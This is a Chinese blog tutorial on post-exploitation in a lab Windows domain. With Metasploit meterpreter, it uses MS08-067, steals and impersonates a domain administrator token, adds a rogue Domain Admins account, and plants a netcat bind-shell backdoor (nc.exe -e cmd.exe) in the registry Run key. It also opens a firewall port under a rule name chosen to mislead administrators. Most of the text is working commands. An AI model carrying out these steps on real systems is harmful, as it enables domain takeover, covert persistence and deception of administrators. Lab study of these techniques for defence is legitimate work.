域環(huán)境提權(quán)、編輯注冊表

Token(令牌),域環(huán)境中提權(quán)

用戶每次登錄時,賬號綁定臨時的token;

訪問資源時提交token進(jìn)行身份驗(yàn)證,類似于web cookie。

Delegate Token:交互會話登錄,(例如直接登錄、遠(yuǎn)程桌面登錄)

Impersonate Token:非交互登錄,(例如訪問文件共享)

注意:在域環(huán)境中,Delegate Token賬號注銷后變成Impersonate Token,權(quán)限依然有效。所以攻擊者一旦獲取域管理員的token后,危害極大!

實(shí)例:server 2003是域控制器,XP加入到域。

首先使用ms08-067漏洞,獲得XP的system權(quán)限;

然后在域控制器上訪問XP的文件共享(\\192.168.80.44\c$),建立一個administrator用戶的Impersonate Token;

meterpreter > load incognito

meterpreter > list_tokens -u

meterpreter > impersonate_token LAB\\Administrator? 將自己偽裝成LAB Administrator用戶 (注意命令中是兩個\)

meterpreter > getuid? 發(fā)現(xiàn)自己現(xiàn)在是域管理員

Server username: LAB\Administrator

meterpreter > execute -f cmd.exe -i -t ?獲得交互shell,-t(使用當(dāng)前假冒的token執(zhí)行程序)


C:\WINDOWS\system32>ipconfig /all ?查看XP的DNS服務(wù)器,即域控制器的ip地址

meterpreter > add_user coleradmin Coleradmin1! -h 192.168.80.11 ?添加用戶

meterpreter > add_group_user "Domain Admins" coleradmin -h 192.168.80.11 ?給予域管理員權(quán)限


編輯注冊表

注冊表的滲透測試中的常見用途:修改、添加啟動項;竊取存儲在注冊表中的機(jī)密信息;繞過文件型病毒查殺。

實(shí)例:編輯注冊表,添加nc到系統(tǒng)啟動項中,形成后門程序。

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 ?將nc.exe上傳到目標(biāo)主機(jī)

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run ?枚舉注冊表的鍵值

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe' ?在當(dāng)前主鍵下增加一個nc鍵值

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc ?查看nc鍵值

在重啟之前,首先要設(shè)置防火墻允許444端口通過。

meterpreter > execute -f cmd -i -H ?最好加上-H參數(shù),不然在目標(biāo)主機(jī)上會彈出cmd窗口

C:\Windows\System32> netsh firewall show opmode ?查看防火墻的狀態(tài)

C:\Windows\System32>netsh firewall add portopening TCP 444 "網(wǎng)絡(luò)發(fā)現(xiàn)(Pub PSD-Out)" ENABLE ALL? 添加防火墻的規(guī)則允許444端口通過(這里“網(wǎng)絡(luò)發(fā)現(xiàn)(Pub PSD-Out)”是規(guī)則名稱,這樣寫是為了迷惑管理員。)

目標(biāo)主機(jī)重啟后,在Kali上使用nc連接它,獲得shell。

root@kali:~# nc 192.168.80.33 444

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容